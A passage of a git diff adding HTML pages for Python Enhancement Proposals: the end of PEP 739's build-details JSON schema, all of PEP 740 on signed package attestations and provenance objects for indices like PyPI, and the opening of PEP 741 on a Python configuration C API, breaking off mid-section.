+ 16      "description": "Schema version.\n\nThis is a string following the format ``<MAJOR>.<MINOR>``, where ``<MAJOR>`` and ``<MINOR>`` are unpaded numbers and represent the **major** and **minor** components of the version. Versions may be arithmetic compared by intrepreting the version string as a decimal number.\n\nFor this specification version, this value is constant and MUST be ``1.0``.\n\nFuture versions of this schema MUST use a higher version number. Future versions of this schema MUST NOT use the same **major** version component as other schema version unless its specification is deemed backwards-compatible with them — it can't change, or extend, any parts of the current specification in such a way as the semantics of the interpreted data differ, or that data valid under the new specification is invalid under the older specification, with the exception of additional properties (errors caused by ``additionalProperties``).",
+ 17      "const": "1.0"
+ 18    },
+ 19    "base_prefix": {
+ 20      "type": "string",
+ 21      "description": "Base prefix of the Python installation.\n\nEither an absolute path, or a relative path to directory where this file is contained.",
+ 22      "examples": [
+ 23        "/usr",
+ 24        "../.."
+ 25      ]
+ 26    },
+ 27    "platform": {
+ 28      "type": "string",
+ 29      "description": "System platform string.\n\nThis field SHOULD be equivalent to ``sysconfig.get_platform()``.",
+ 30      "examples": [
+ 31        "linux-x86_64"
+ 32      ]
+ 33    },
+ 34    "language": {
+ 35      "type": "object",
+ 36      "description": "Object containing details related to the Python language specification.\n\nIn addition to the required keys, implementations may choose to include extra keys with implementation-specific details.",
+ 37      "required": [
+ 38        "version"
+ 39      ],
+ 40      "additionalProperties": false,
+ 41      "properties": {
+ 42        "version": {
+ 43          "type": "string",
+ 44          "description": "String representation the Python language version — a version string consisting only of the *major* and *minor* components.\n\nThis field SHOULD be equivalent to ``sysconfig.get_python_version()``.",
+ 45          "examples": ["3.14"]
+ 46        },
+ 47        "version_info": {
+ 48          "type": "object",
+ 49          "description": "Object in the format of :py:data:`sys.version_info`.\n\nThis section SHOULD be equivalent to :py:data:`sys.version_info`.",
+ 50          "required": ["major", "minor", "micro", "releaselevel", "serial"],
+ 51          "additionalProperties": false,
+ 52          "examples": [
+ 53            {
+ 54              "major": 3,
+ 55              "minor": 14,
+ 56              "micro": 1,
+ 57              "releaselevel": "final",
+ 58              "serial": 0
+ 59            }
+ 60          ],
+ 61          "properties": {
+ 62            "major": {
+ 63              "type": "number"
+ 64            },
+ 65            "minor": {
+ 66              "type": "number"
+ 67            },
+ 68            "micro": {
+ 69              "type": "number"
+ 70            },
+ 71            "releaselevel": {
+ 72              "type": "string",
+ 73              "enum": ["alpha", "beta", "candidate", "final"]
+ 74            },
+ 75            "serial": {
+ 76              "type": "number"
+ 77            }
+ 78          }
+ 79        }
+ 80      }
+ 81    },
+ 82    "implementation": {
+ 83      "type": "object",
+ 84      "description": "Object containing details related to Python implementation.\n\nThis section SHOULD be equivalent to :py:data:`sys.implementation`. It follows specification defined in PEP 421, meaning that on top of the required keys, implementation-specific keys can also exist, but must be prefixed with an underscore.",
+ 85      "required": [
+ 86        "name",
+ 87        "version",
+ 88        "hexversion",
+ 89        "cache_tag"
+ 90      ],
+ 91      "additionalProperties": true,
+ 92      "properties": {
+ 93        "name": {
+ 94          "type": "string",
+ 95          "description": "Lower-case name of the Python implementation.",
+ 96          "examples": ["cpython", "pypy"]
+ 97        },
+ 98        "version": {
+ 99          "type": "object",
+100          "description": "Object in the format of :py:data:`sys.version_info`, containing the implementation version.",
+101          "required": ["major", "minor", "micro", "releaselevel", "serial"],
+102          "additionalProperties": false,
+103          "examples": [
+104            {
+105              "major": 3,
+106              "minor": 14,
+107              "micro": 1,
+108              "releaselevel": "final",
+109              "serial": 0
+110            },
+111            {
+112              "major": 7,
+113              "minor": 3,
+114              "micro": 16,
+115              "releaselevel": "final",
+116              "serial": 0
+117            }
+118          ],
+119          "properties": {
+120            "major": {
+121              "type": "number"
+122            },
+123            "minor": {
+124              "type": "number"
+125            },
+126            "micro": {
+127              "type": "number"
+128            },
+129            "releaselevel": {
+130              "type": "string",
+131              "enum": ["alpha", "beta", "candidate", "final"]
+132            },
+133            "serial": {
+134              "type": "number"
+135            }
+136          }
+137        }
+138      }
+139    },
+140    "interpreter": {
+141      "type": "object",
+142      "description": "Object containing details Python interpreter.\n\nThis section MUST be present if the Python installation provides an interpreter binary, otherwise this section will be missing.",
+143      "required": [
+144        "path"
+145      ],
+146      "additionalProperties": false,
+147      "properties": {
+148        "path": {
+149          "type": "string",
+150          "description": "The path to the Python interprer. Either an absolute path, or a relative path to the path defined in the ``base_prefix`` key.",
+151          "examples": [
+152            "/usr/bin/python",
+153            "bin/python"
+154          ]
+155        }
+156      }
+157    },
+158    "abi": {
+159      "type": "object",
+160      "description": "Object containing details related to ABI.",
+161      "required": [
+162        "flags",
+163        "extension_suffix"
+164      ],
+165      "additionalProperties": false,
+166      "properties": {
+167        "flags": {
+168          "type": "array",
+169          "description": "Build configuration flags, used to calculate the extension suffix.\n\nThe flags MUST be defined in the order they appear on the extension suffix.",
+170          "additionalProperties": true,
+171          "examples": [
+172            ["t", "d"]
+173          ]
+174        },
+175        "extension_suffix": {
+176          "type": "string",
+177          "description": "Suffix used for extensions built against the current implementation version.\n\nThis field MUST be present if the Python implementation supports extensions, otherwise this entry will be missing.",
+178          "examples": [
+179            ".cpython-314-x86_64-linux-gnu.so"
+180          ]
+181        },
+182        "stable_abi_suffix": {
+183          "type": "string",
+184          "description": "Suffix used for extensions built against the stable ABI.\n\nThis field MUST be present if the Python implementation has a stable ABI extension suffix, otherwise this entry will be missing.",
+185          "examples": [
+186            ".abi3.so"
+187          ]
+188        }
+189      }
+190    },
+191    "suffixes": {
+192      "type": "object",
+193      "description": "Valid module suffixes grouped by type.\n\nThis section SHOULD be equivalent to the ``importlib.machinery.*_SUFFIXES`` attributes, if the implementation provides such suffixes. However, if the Python implementation does not provide suffixes of the kind specified by any of the attributes, the equivalent sub-section is not required to be present. Additionally, if a Python implementation provides extension kinds other than the ones listed on ``importlib.machinery`` module, they MAY add a sub-section for them.",
+194      "examples": [
+195        {
+196          "source": [".py"],
+197          "bytecode": [".pyc"],
+198          "optimized_bytecode": [".pyc"],
+199          "debug_bytecode": [".pyc"],
+200          "extensions": [".cpython-313-x86_64-linux-gnu.so", ".abi3.so", ".so"]
+201        }
+202      ]
+203    },
+204    "libpython": {
+205      "type": "object",
+206      "description": "Object containing details related to the ``libpython`` library.\n\nThis section MUST by present if Python installation provides a ``libpython`` library, otherwise this section will be missing.",
+207      "additionalProperties": false,
+208      "properties": {
+209        "dynamic": {
+210          "type": "string",
+211          "description": "The path to the dynamic ``libpython`` library. Either an absolute path, or a relative path to the path defined in the ``base_prefix`` key.\n\nThis field MUST be present if the Python installation provides a dynamic ``libpython`` library, otherwise this entry will be missing.",
+212          "examples": [
+213            "/usr/lib/libpython3.14.so.1.0",
+214            "lib/libpython3.14.so.1.0"
+215          ]
+216        },
+217        "dynamic_stableabi": {
+218          "type": "string",
+219          "description": "The path to the dynamic ``libpython`` library for the stable ABI. Either an absolute path, or a relative path to the path defined in the ``base_prefix`` key.\n\nThis field MUST be present if the Python installation provides a dynamic ``libpython`` library, otherwise this entry will be missing.",
+220          "examples": [
+221            "/usr/lib/libpython3.so",
+222            "lib/libpython3.so"
+223          ]
+224        },
+225        "static": {
+226          "type": "string",
+227          "description": "The path to the static ``libpython`` library. Either an absolute path, or a relative path to the path defined in the ``base_prefix`` key.\n\nThis field MUST be present if the Python installation provides a static ``libpython`` library, otherwise this entry will be missing.",
+228          "examples": [
+229            "/usr/lib/python3.14/config-3.14-x86_64-linux-gnu/libpython3.14.a",
+230            "lib/python3.14/config-3.14-x86_64-linux-gnu/libpython3.14.a"
+231          ]
+232        },
+233        "link_to_libpython": {
+234          "type": "boolean",
+235          "description": "Should extensions built against a dynamic ``libpython`` link to it?\n\nThis field MUST be present if the Python installation provides a dynamic ``libpython`` library, otherwise this entry will be missing."
+236        }
+237      }
+238    },
+239    "c_api": {
+240      "type": "object",
+241      "description": "Object containing details related to the Python C API, if available.\n\nThis section MUST be present if the Python implementation provides a C API, otherwise this section will be missing.",
+242      "required": [
+243        "headers"
+244      ],
+245      "additionalProperties": false,
+246      "properties": {
+247        "headers": {
+248          "type": "string",
+249          "description": "The path to the C API headers. Either an absolute path, or a relative path to the path defined in the ``base_prefix`` key.",
+250          "examples": [
+251            "/usr/include/python3.14",
+252            "include/python3.14"
+253          ]
+254        },
+255        "pkgconfig_path": {
+256          "type": "string",
+257          "description": "The path to the pkg-config definition files. Either an absolute path, or a relative path to the path defined in the ``base_prefix`` key.\n\nThis field MUST be present if the Python implementation provides pkg-config definition files for the C API, otherwise this section will be missing.",
+258          "examples": [
+259            "/usr/lib/pkgconfig",
+260            "lib/pkgconfig"
+261          ]
+262        }
+263      }
+264    },
+265    "arbitrary_data": {
+266      "type": "object",
+267      "description": "Object containing extra arbitrary data.\n\nThis is meant to be used as an escape-hatch, to include any relevant data that is not covered by this specification. Implamentations may choose what data to provide in this section.",
+268      "additionalProperties": true
+269    }
+270  }
+271}
+
+
+
+
+

Rejected Ideas

+
+

Having a larger scope

+

One of the main requests in the discussion of this PEP was the inclusion of +other kind of information, such as the site-packages path. It is the opinion +of the PEP authors that information regarding the Python environment should be +provided by a separate file, creating the a clear separation between the build +details, which should be immutable across any interpreter instance, and details +that can change, such as environment details.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0739.rst

+

Last modified: 2024-11-06 17:11:55 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0740/index.html b/pep-0740/index.html new file mode 100644 index 00000000000..2fffbb3477e --- /dev/null +++ b/pep-0740/index.html @@ -0,0 +1,876 @@ + + + + + + + + PEP 740 – Index support for digital attestations | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 740 – Index support for digital attestations

+
+
Author:
+
William Woodruff <william at yossarian.net>, +Facundo Tuesca <facundo.tuesca at trailofbits.com>, +Dustin Ingram <di at python.org>
+
Sponsor:
+
Donald Stufft <donald at stufft.io>
+
PEP-Delegate:
+
Donald Stufft <donald at stufft.io>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
08-Jan-2024
+
Post-History:
+
02-Jan-2024, +29-Jan-2024
+
Resolution:
+
17-Jul-2024
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Index hosted attestations, is maintained on the PyPA specs page.

+

×

+

See the PyPA specification update process for how to propose changes.

+
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at PyPI - Digital Attestations.

+

×

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

This PEP proposes a collection of changes related to the upload and distribution +of digitally signed attestations and metadata used to verify them on a Python +package repository, such as PyPI.

+

These changes have two subcomponents:

+ +

This PEP does not make a policy recommendation around mandatory digital +attestations on release uploads or their subsequent verification by installing +clients like pip.

+
+
+

Rationale and Motivation

+

Desire for digital signatures on Python packages has been repeatedly +expressed by both package maintainers and downstream users:

+
    +
  • Maintainers wish to demonstrate the integrity and authenticity of their +package uploads;
  • +
  • Individual downstream users wish to verify package integrity and authenticity +without placing additional trust in their index’s honesty;
  • +
  • “Bulk” downstream users (such as Operating System distributions) wish to +perform similar verifications and potentially re-expose or countersign +for their own downstream packaging ecosystems.
  • +
+

This proposal seeks to accommodate each of the above use cases.

+

Additionally, this proposal identifies the following motivations:

+
    +
  • Verifiable provenance for Python package distributions: many Python +packages currently contain unauthenticated provenance metadata, such +as URLs for source hosts. A cryptographic attestation format could enable +strong authenticated links between these packages and their source hosts, +allowing both the index and downstream users to cryptographically verify that +a package originates from its claimed source repository.
  • +
  • Raising attacker requirements: an attacker who seeks to take +over a Python package can be described along sophistication +(unsophisticated to sophisticated) and targeting dimensions +(opportunistic to targeted).

    Digital attestations impose additional sophistication requirements: the +attacker must be sufficiently sophisticated to access private signing material +(or signing identities).

    +
  • +
  • Index verifiability: in the status quo, the only attestation provided by the +index is an optional PGP signature per release file +(see PGP signatures). These signatures are not +(and cannot be) checked by the index either for well-formedness or for +validity, since the index has no mechanism for identifying the right public +key for the signature. This PEP overcomes this limitation +by ensuring that provenance objects contain all +of the metadata needed by the index to verify an attestation’s validity.
  • +
+

This PEP proposes a generic attestation format, containing an +attestation statement for signature generation, +with the expectation that index providers adopt the +format with a suitable source of identity for signature verification, such as +Trusted Publishing.

+
+

Design Considerations

+

This PEP identifies the following design considerations when evaluating +both its own proposed changes and previous work in the same or adjacent +areas of Python packaging:

+
    +
  1. Index accessibility: digital attestations for Python packages +are ideally retrievable directly from the index itself, as “detached” +resources.

    This both simplifies some compatibility concerns (by avoiding +the need to modify the distribution formats themselves) and also simplifies +the behavior of potential installing clients (by allowing them to +retrieve each attestation before its corresponding package without needing +to do streaming decompression).

    +
  2. +
  3. Verification by the index itself: in addition to enabling verification +by installing clients, each digital attestation is ideally verifiable +in some form by the index itself.

    This both increases the overall quality +of attestations uploaded to the index (preventing, for example, users +from accidentally uploading incorrect or invalid attestations) and also +enables UI and UX refinements on the index itself (such as a “provenance” +view for each uploaded package).

    +
  4. +
  5. General applicability: digital attestations should be applicable to +any and every package uploaded to the index, regardless of its format +(sdist or wheel) or interior contents.
  6. +
  7. Metadata support: this PEP refers to “digital attestations” rather than +just “digital signatures” to emphasize the ideal presence of additional +metadata within the cryptographic envelope.

    For example, to prevent domain separation between a distribution’s name and +its contents, this PEP uses ‘Statements’ +from the in-toto project to bind the distribution’s +contents (via SHA-256 digest) to its filename.

    +
  8. +
+
+
+

Previous Work

+
+

PGP signatures

+

PyPI and other indices have historically supported PGP signatures on uploaded +distributions. These could be supplied during upload, and could be retrieved +by installing clients via the data-gpg-sig attribute in the PEP 503 +API, the gpg-sig key on the PEP 691 API, or via an adjacent +.asc-suffixed URL.

+

PGP signature uploads have been disabled on PyPI since +May 2023, after +an investigation +determined that the majority of signatures (which, themselves, constituted a +tiny percentage of overall uploads) could not be associated with a public key or +otherwise meaningfully verified.

+

In their previously supported form on PyPI, PGP signatures satisfied +considerations (1) and (3) above but not (2) (owing to the need for external +keyservers and key distribution) or (4) (due to PGP signatures typically being +constructed over just an input file, without any associated signed metadata).

+
+
+

Wheel signatures

+

PEP 427 (and its living PyPA counterpart) +specify the wheel format.

+

This format includes accommodations for digital signatures embedded directly +into the wheel, in either JWS or S/MIME format. These signatures are specified +over a PEP 376 RECORD, which is modified to include a cryptographic digest +for each recorded file in the wheel.

+

While wheel signatures are fully specified, they do not appear to be broadly +used; the official wheel tooling deprecated +signature generation and verification support +in 0.32.0, which was +released in 2018.

+

Additionally, wheel signatures do not satisfy any of +the above considerations (due to the “attached” nature of the signatures, +non-verifiability on the index itself, and support for wheels only).

+
+
+
+
+

Specification

+
+

Upload endpoint changes

+

The current upload API is not standardized. However, we propose the following +changes to it:

+
    +
  • In addition to the current top-level content and gpg_signature fields, +the index SHALL accept attestations as an additional multipart form +field.
  • +
  • The new attestations field SHALL be a JSON array.
  • +
  • The attestations array SHALL have one or more items, each a JSON object +representing an individual attestation.
  • +
  • Each attestation object MUST be verifiable by the index. If the index fails +to verify any attestation in attestations, it MUST reject the upload. +The format of attestation objects is defined under Attestation objects +and the process for verifying attestations is defined under +Attestation verification.
  • +
+
+
+

Index changes

+
+

Simple Index

+

The following changes are made to the +simple repository API:

+ +
+
+

JSON-based Simple API

+

The following changes are made to the +JSON simple API:

+
    +
  • When an uploaded file has one or more attestations, the index MAY +include a provenance key in the file dictionary for that file.

    The value of the provenance key SHALL be either a JSON string +or null. If provenance is not null, it SHALL be a URL +to the associated provenance file.

    +

    See Appendix 3: Simple JSON API size considerations for an explanation of the technical decision to +embed the SHA-256 digest in the JSON API, rather than the full +provenance object.

    +
  • +
+

These changes require a version change to the JSON API:

+
    +
  • The api-version SHALL specify version 1.3 or later.
  • +
+
+
+
+

Attestation objects

+

An attestation object is a JSON object with several required keys; applications +or signers may include additional keys so long as all explicitly +listed keys are provided. The required layout of an attestation +object is provided as pseudocode below.

+
@dataclass
+class Attestation:
+    version: Literal[1]
+    """
+    The attestation object's version, which is always 1.
+    """
+
+    verification_material: VerificationMaterial
+    """
+    Cryptographic materials used to verify `envelope`.
+    """
+
+    envelope: Envelope
+    """
+    The enveloped attestation statement and signature.
+    """
+
+
+@dataclass
+class Envelope:
+    statement: bytes
+    """
+    The attestation statement.
+
+    This is represented as opaque bytes on the wire (encoded as base64),
+    but it MUST be an JSON in-toto v1 Statement.
+    """
+
+    signature: bytes
+    """
+    A signature for the above statement, encoded as base64.
+    """
+
+@dataclass
+class VerificationMaterial:
+    certificate: str
+    """
+    The signing certificate, as `base64(DER(cert))`.
+    """
+
+    transparency_entries: list[object]
+    """
+    One or more transparency log entries for this attestation's signature
+    and certificate.
+    """
+
+
+

A full data model for each object in transparency_entries is provided in +Appendix 2: Data models for Transparency Log Entries. Attestation objects SHOULD include one or more +transparency log entries, and MAY include additional keys for other +sources of signed time (such as an RFC 3161 Time Stamping Authority or a +Roughtime server).

+

Attestation objects are versioned; this PEP specifies version 1. Each version +is tied to a single cryptographic suite to minimize unnecessary cryptographic +agility. In version 1, the suite is as follows:

+
    +
  • Certificates are specified as X.509 certificates, and comply with the +profile in RFC 5280.
  • +
  • The message signature algorithm is ECDSA, with the P-256 curve for public keys +and SHA-256 as the cryptographic digest function.
  • +
+

Future PEPs may change this suite (and the overall shape of the attestation +object) by selecting a new version number.

+
+

Attestation statement and signature generation

+

The attestation statement is the actual claim that is cryptographically signed +over within the attestation object (i.e., the envelope.statement).

+

The attestation statement is encoded as a +v1 in-toto Statement object, +in JSON form. When serialized the statement is treated as an opaque binary blob, +avoiding the need for canonicalization. An example JSON-encoded statement is +provided in Appendix 4: Example attestation statement.

+

In addition to being a v1 in-toto Statement, the attestation statement is constrained +in the following ways:

+
    +
  • The in-toto subject MUST contain only a single subject.
  • +
  • subject[0].name is the distribution’s filename, which MUST be +a valid source distribution or +wheel distribution filename.
  • +
  • subject[0].digest MUST contain a SHA-256 digest. Other digests +MAY be present. The digests MUST be represented as hexadecimal strings.
  • +
  • The following predicateType values are supported: +
  • +
+

The signature over this statement is constructed using the +v1 DSSE signature protocol, +with a PAYLOAD_TYPE of application/vnd.in-toto+json and a PAYLOAD_BODY of the JSON-encoded +statement above. No other PAYLOAD_TYPE is permitted.

+
+
+
+

Provenance objects

+

The index will serve uploaded attestations along with metadata that can assist +in verifying them in the form of JSON serialized objects.

+

These provenance objects will be available via both the Simple Index +and JSON-based Simple API as described above, and will have the following layout:

+
{
+    "version": 1,
+    "attestation_bundles": [
+      {
+        "publisher": {
+          "kind": "important-ci-service",
+          "claims": {},
+          "vendor-property": "foo",
+          "another-property": 123
+        },
+        "attestations": [
+          { /* attestation 1 ... */ },
+          { /* attestation 2 ... */ }
+        ]
+      }
+    ]
+}
+
+
+

or, as pseudocode:

+
@dataclass
+class Publisher:
+    kind: string
+    """
+    The kind of Trusted Publisher.
+    """
+
+    claims: object | None
+    """
+    Any context-specific claims retained by the index during Trusted Publisher
+    authentication.
+    """
+
+    _rest: object
+    """
+    Each publisher object is open-ended, meaning that it MAY contain additional
+    fields beyond the ones specified explicitly above. This field signals that,
+    but is not itself present.
+    """
+
+@dataclass
+class AttestationBundle:
+    publisher: Publisher
+    """
+    The publisher associated with this set of attestations.
+    """
+
+    attestations: list[Attestation]
+    """
+    The set of attestations included in this bundle.
+    """
+
+@dataclass
+class Provenance:
+    version: Literal[1]
+    """
+    The provenance object's version, which is always 1.
+    """
+
+    attestation_bundles: list[AttestationBundle]
+    """
+    One or more attestation "bundles".
+    """
+
+
+
    +
  • version is 1. Like attestation objects, provenance objects are +versioned, and this PEP only defines version 1.
  • +
  • attestation_bundles is a required JSON array, containing one +or more “bundles” of attestations. Each bundle corresponds to a +signing identity (such as a Trusted Publishing identity), and contains +one or more attestation objects.

    As noted in the Publisher model, +each AttestationBundle.publisher object is specific to its Trusted Publisher +but must include at minimum:

    +
      +
    • A kind key, which MUST be a JSON string that uniquely identifies the +kind of Trusted Publisher.
    • +
    • A claims key, which MUST be a JSON object containing any context-specific +claims retained by the index during Trusted Publisher authentication.
    • +
    +

    All other keys in the publisher object are publisher-specific. A full +illustrative example of a publisher object is provided in Appendix 1: Example Trusted Publisher Representation.

    +

    Each array of attestation objects is a superset of the attestations +array supplied by the uploaded through the attestations field at upload +time, as described in Upload endpoint changes and +Changes to provenance objects.

    +
  • +
+
+

Changes to provenance objects

+

Provenance objects are not immutable, and may change over time. Reasons +for changes to the provenance object include but are not limited to:

+
    +
  • Addition of new attestations for a pre-existing signing identity: the index +MAY choose to allow additional attestations by pre-existing signing +identities, such as newer attestation versions for already uploaded +files.
  • +
  • Addition of new signing identities and associated attestations: the index +MAY choose to support attestations from sources other than the file’s +uploader, such as third-party auditors or the index itself. These attestations +may be performed asynchronously, requiring the index to insert them into +the provenance object post facto.
  • +
+
+
+
+

Attestation verification

+

Verifying an attestation object against a distribution file requires verification of each of the +following:

+
    +
  • version is 1. The verifier MUST reject any other version.
  • +
  • verification_material.certificate is a valid signing certificate, as +issued by an a priori trusted authority (such as a root of trust already +present within the verifying client).
  • +
  • verification_material.certificate identifies an appropriate signing +subject, such as the machine identity of the Trusted Publisher that published +the package.
  • +
  • envelope.statement is a valid in-toto v1 Statement, with a subject +and digest that MUST match the distribution’s filename and contents. +For the distribution’s filename, matching MUST be performed by parsing +using the appropriate source distribution or wheel filename format, as +the statement’s subject may be equivalent but normalized.
  • +
  • envelope.signature is a valid signature for envelope.statement +corresponding to verification_material.certificate, +as reconstituted via the +v1 DSSE signature protocol.
  • +
+

In addition to the above required steps, a verifier MAY additionally verify +verification_material.transparency_entries on a policy basis, e.g. requiring +at least one transparency log entry or a threshold of entries. When verifying +transparency entries, the verifier MUST confirm that the inclusion time for +each entry lies within the signing certificate’s validity period.

+
+
+
+

Security Implications

+

This PEP is primarily “mechanical” in nature; it provides layouts for +structuring and serving verifiable digital attestations without specifying +higher level security “policies” around attestation validity, thresholds +between attestations, and so forth.

+
+

Cryptographic agility in attestations

+

Algorithmic agility is a common source of exploitable vulnerabilities +in cryptographic schemes. This PEP limits algorithmic agility in two ways:

+
    +
  • All algorithms are specified in a single suite, rather than a geometric +collection of parameters. This makes it impossible (for example) for an +attacker to select a strong signature algorithm with a weak hash function, +compromising the scheme as a whole.
  • +
  • Attestation objects are versioned, and may only contain the algorithmic +suite specified for their version. If a specific suite +is considered insecure in the future, clients may choose to blanket reject +or qualify verifications of attestations that contain that suite.
  • +
+
+
+

Index trust

+

This PEP does not increase (or decrease) trust in the index itself: +the index is still effectively trusted to honestly deliver unmodified package +distributions, since a dishonest index capable of modifying package +contents could also dishonestly modify or omit package attestations. +As a result, this PEP’s presumption of index trust is equivalent to the +unstated presumption with earlier mechanisms, like PGP and wheel signatures.

+

This PEP does not preclude or exclude future index trust mechanisms, such +as PEP 458 and/or PEP 480.

+
+
+
+

Recommendations

+

This PEP recommends, but does not mandate, that attestation objects +contain one or more verifiable sources of signed time that corroborate the +signing certificate’s claimed validity period. Indices that implement this +PEP may choose to strictly enforce this requirement.

+
+
+

Appendix 1: Example Trusted Publisher Representation

+

This appendix provides a fictional example of a publisher key within +a simple JSON API project.files[].provenance listing:

+
"publisher": {
+    "kind": "GitHub",
+    "claims": {
+        "ref": "refs/tags/v1.0.0",
+        "sha": "da39a3ee5e6b4b0d3255bfef95601890afd80709"
+    },
+    "repository_name": "HolyGrail",
+    "repository_owner": "octocat",
+    "repository_owner_id": "1",
+    "workflow_filename": "publish.yml",
+    "environment": null
+}
+
+
+
+
+

Appendix 2: Data models for Transparency Log Entries

+

This appendix contains pseudocoded data models for transparency log entries +in attestation objects. Each transparency log entry serves as a source +of signed inclusion time, and can be verified either online or offline.

+
@dataclass
+class TransparencyLogEntry:
+    log_index: int
+    """
+    The global index of the log entry, used when querying the log.
+    """
+
+    log_id: str
+    """
+    An opaque, unique identifier for the log.
+    """
+
+    entry_kind: str
+    """
+    The kind (type) of log entry.
+    """
+
+    entry_version: str
+    """
+    The version of the log entry's submitted format.
+    """
+
+    integrated_time: int
+    """
+    The UNIX timestamp from the log from when the entry was persisted.
+    """
+
+    inclusion_proof: InclusionProof
+    """
+    The actual inclusion proof of the log entry.
+    """
+
+
+@dataclass
+class InclusionProof:
+    log_index: int
+    """
+    The index of the entry in the tree it was written to.
+    """
+
+    root_hash: str
+    """
+    The digest stored at the root of the Merkle tree at the time of proof
+    generation.
+    """
+
+    tree_size: int
+    """
+    The size of the Merkle tree at the time of proof generation.
+    """
+
+    hashes: list[str]
+    """
+    A list of hashes required to complete the inclusion proof, sorted
+    in order from leaf to root. The leaf and root hashes are not themselves
+    included in this list; the root is supplied via `root_hash` and the client
+    must calculate the leaf hash.
+    """
+
+    checkpoint: str
+    """
+    The signed tree head's signature, at the time of proof generation.
+    """
+
+    cosigned_checkpoints: list[str]
+    """
+    Cosigned checkpoints from zero or more log witnesses.
+    """
+
+
+
+
+

Appendix 3: Simple JSON API size considerations

+

A previous draft of this PEP required embedding each +provenance object directly into its appropriate part +of the JSON Simple API.

+

The current version of this PEP embeds the SHA-256 digest of the provenance +object instead. This is done for size and network bandwidth consideration +reasons:

+
    +
  1. We estimate the typical size of an attestation object to be approximately +5.3 KB of JSON.
  2. +
  3. We conservatively estimate that indices eventually host around 3 attestations +per release file, or approximately 15.9 KB of JSON per combined provenance +object.
  4. +
  5. As of May 2024, the average project on PyPI has approximately 21 release +files. We conservatively expect this average to increase over time.
  6. +
  7. Combined, these numbers imply that a typical project might expect to host +between 60 and 70 attestations, or approximately 339 KB of additional JSON +in its “project detail” endpoint.
  8. +
+

These numbers are significantly worse in “pathological” cases, where projects +have hundreds or thousands of releases and/or dozens of files per release.

+
+
+

Appendix 4: Example attestation statement

+

Given a source distribution sampleproject-1.2.3.tar.gz with a SHA-256 +digest of e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, +the following is an appropriate in-toto Statement, as a JSON object:

+
{
+  "_type": "https://in-toto.io/Statement/v1",
+  "subject": [
+    {
+      "name": "sampleproject-1.2.3.tar.gz",
+      "digest": {"sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"}
+    }
+  ],
+  "predicateType": "https://some-arbitrary-predicate.example.com/v1",
+  "predicate": {
+    "something-else": "foo"
+  }
+}
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0740.rst

+

Last modified: 2024-12-03 18:16:41 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0741/index.html b/pep-0741/index.html new file mode 100644 index 00000000000..438a86bd8fc --- /dev/null +++ b/pep-0741/index.html @@ -0,0 +1,1157 @@ + + + + + + + + PEP 741 – Python Configuration C API | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 741 – Python Configuration C API

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
18-Jan-2024
+
Python-Version:
+
3.14
+
Post-History:
+
19-Jan-2024, +08-Feb-2024
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Add a C API to configure the Python initialization without relying on C +structures and the ability to make ABI-compatible changes in the future.

+

Complete PEP 587 API by adding PyInitConfig_AddModule() which can be +used to add a built-in extension module; feature previously referred to +as the “inittab”.

+

Add PyConfig_Get() and PyConfig_Set() functions to +get and set the current runtime configuration.

+

PEP 587 “Python Initialization Configuration” unified all the ways to +configure the Python initialization. This PEP unifies also the +configuration of the Python preinitialization and the Python +initialization in a single API. Moreover, this PEP only provides a +single choice to embed Python, instead of having two “Python” and +“Isolated” choices (PEP 587), to simplify the API further.

+

The lower level PEP 587 PyConfig API remains available for use +cases with an intentionally higher level of coupling to CPython +implementation details (such as emulating the full functionality of +CPython’s CLI, including its configuration mechanisms).

+
+
+

Rationale

+
+

Get the runtime configuration

+

PEP 587 has no API to get the current runtime configuration, +only to configure the Python initialization.

+

For example, the global configuration variable +Py_UnbufferedStdioFlag was deprecated in Python 3.12 and using +PyConfig.buffered_stdio is recommended instead. It only works to +configure Python, there is no public API to get +PyConfig.buffered_stdio.

+

Users of the limited C API are asking for a public API to get the +current runtime configuration.

+

Cython needs to get the optimization_level configuration option: +issue.

+

When global configuration variables were deprecated in 2022, Marc-André +Lemburg requested +a C API to access these configuration variables at runtime (not only +during Python initialization).

+
+
+

Security fix

+

To fix CVE-2020-10735, +a denial-of-service when converting a very large string to an integer (in base +10), it was discussed to add a new PyConfig member to stable +branches which affects the ABI.

+

Gregory P. Smith proposed a different API using text based configuration +file to not be limited by PyConfig members: FR: Allow private +runtime config to enable extending without breaking the PyConfig ABI +(August 2022).

+

In the end, it was decided to not add a new PyConfig member to +stable branches, but only add a new PyConfig.int_max_str_digits +member to the development branch (which became Python 3.12). A dedicated +private global variable (unrelated to PyConfig) is used in stable +branches.

+
+
+

Redundancy between PyPreConfig and PyConfig

+

The Python preinitialization uses the PyPreConfig structure and the +Python initialization uses the PyConfig structure. Both structures +have four duplicated members: dev_mode, parse_argv, isolated +and use_environment.

+

The redundancy is caused by the fact that the two structures are +separated, whereas some PyConfig members are needed by the +preinitialization.

+
+
+

Embedding Python

+
+

Applications embedding Python

+

Examples:

+ +

On Linux, FreeBSD and macOS, applications are usually either statically +linked to a libpython, or load dynamically a libpython . The +libpython shared library is versioned, example: +libpython3.12.so for Python 3.12 on Linux.

+

